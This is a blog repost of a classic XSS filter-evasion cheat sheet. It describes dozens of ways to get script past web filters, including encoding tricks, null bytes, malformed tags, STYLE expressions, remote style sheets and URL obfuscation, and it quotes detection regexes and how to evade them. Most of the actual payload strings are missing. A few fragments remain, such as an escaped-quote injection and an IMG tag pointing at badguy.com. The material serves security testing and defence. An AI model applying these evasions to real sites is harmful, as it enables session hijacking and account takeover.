    Malformed IMG tags. Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    fromCharCode (if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need). Click here to build your own (thanks to Hannes Leopold):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS calculator for more information:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). Use the XSS calculator for more information:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Embedded tab to break up the cross site scripting attack:
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Embedded encoded tab to break up XSS:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Embeded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector) these are not spaces just one of the three characters as described above:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Null breaks up JavaScript directive. Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Null breaks up cross site scripting vector. Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s":

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Non-alpha-non-digit part 2 XSS. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Non-alpha-non-digit part 3 XSS. Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    No closing script tags. In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Half open HTML/JavaScript XSS vector. Unlike Firefox the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Double open angle brackets. This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    XSS with no single quotes or double quotes or semicolons:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    End title tag. This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    INPUT image:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    BODY image:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Event Handlers that can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Please note I have excluded browser support from this section because each one may have different results in different browsers. Thanks to Rene Ledosquet for the HTML+TIME updates:



    IMG Dynsrc:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    IMG lowsrc:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    BGSOUND:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    & JavaScript includes (works in Netscape 4.x):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]


    LAYER (also only works in Netscape 4.x)

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]


    STYLE sheet:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Remote style sheet part 3. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Local htc file. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    List-style-image. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    VBscript in an image:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Mocha (older versions of Netscape only):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]


    Livescript (older versions of Netscape only):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]


    US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]


    META (the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    META using data: directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    META with additional URL parameter. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    IFRAME (if iframes are allowed there are a lot of other XSS problems as well):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    FRAME (frames have the same sorts of XSS problems as iframes):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    TABLE (who would have thought tables were XSS targets... except me, of course):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    TD (just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    DIV background-image:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    DIV background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    DIV expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov for this one):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    STYLE tag (Older versions of Netscape only):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]


    STYLE tag using background-image:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    STYLE tag using background:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    OBJECT tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Using an OBJECT tag you can embed XSS directly (this is unverified so no browser support is added):



    Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    You can EMBED SVG which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Using ActionScript inside flash can obfuscate your XSS vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    XML namespace. The htc file must be located on the same server as your XSS vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    IMG Embedded commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Cookie manipulation - admittidly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]




XSS using HTML quote encapsulation:
    This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]




URL string evasion (assuming "http://www.google.com/" is programmatically disallowed):
    IP verses hostname:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    URL encoding:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Dword encoding (Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0.
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Extra dot for absolute DNS:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    JavaScript link location:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: "java&#x26;#x09;script:" was converted into "java&#x09;script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


Character Encoding:
    All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?):




Character Encoding Calculator

ASCII Text:

Hex Value:
    URL:


    HTML (with semicolons):


Decimal Value:
    HTML (without semicolons):

Base64 Value (a more robust base64 calculator can be found here)
    Base64:



IP Address:
    : dword level
Dword Address:
Hex Address:
Octal Address:


Browser support reference table:


IE7.0 Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.
IE6.0 Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.
NS8.1-IE Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option.
NS8.1-G Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional
FF2.0 Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.
O9.02 Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional
NS4 Vector works in older versions of Netscape 4.0 - untested.

Note: if a vector is not marked it either does not work or it is untested.


Written in vim, and UTF-8 encoded, for her pleasure.
All rights reserved, all wrongs observed.
© 1995-2008 RSnake

'Hacking' 카테고리의 다른 글

SF Hacking (Purple Folder)  (1) 2009.02.10
How to be penetration tester? (Computer Security Specialist?)  (0) 2009.02.08
CIS benchmarks  (0) 2009.02.06
Below is a list of resources you've selected:  (0) 2009.02.06
Security Metrics  (0) 2009.02.06
Posted by CEOinIRVINE
l

CIS benchmarks

Hacking 2009. 2. 6. 09:19

CIS.alz
CIS.a00
CIS.a01
CIS.a02
CIS.a03
CIS.a04
CIS.a05
CIS.a06
CIS.a07
CIS.a08
CIS.a09
CIS.a10
CIS.a11

'Hacking' 카테고리의 다른 글

How to be penetration tester? (Computer Security Specialist?)  (0) 2009.02.08
XSS Cheat Sheet  (0) 2009.02.06
Below is a list of resources you've selected:  (0) 2009.02.06
Security Metrics  (0) 2009.02.06
CIS BenchMark  (0) 2009.02.06
Posted by CEOinIRVINE
l
◀ 이전페이지 1 ··· 12 13 14 15 16 17 18 ··· 27 다음페이지 ▶
블로그 이미지
Information Security & US & Life & Love & Fashion & Hacking & Passion hack, web security, game security, game hack, fps, ava, wow, starcraft II, soldier front, gunz, reverse engineering, SQL injection, XSS, hacking, penetration testings, IT, internet technlogoy, security, penetratoin testing, XSS, XSRF CEOinIRVINE

최근에 올라온 글

공지사항

카테고리

CEOinIRVINE (2282)
Editorials (4)
Finance & EMBA (1)
Fashion (239)
IT (215)
Hacking (266)
Online Game (17)
Vocabulary (14)
iLoveBlackberry (2)
Business (1108)
Politics (165)
US News (115)
World News (63)
Career Consulting (8)
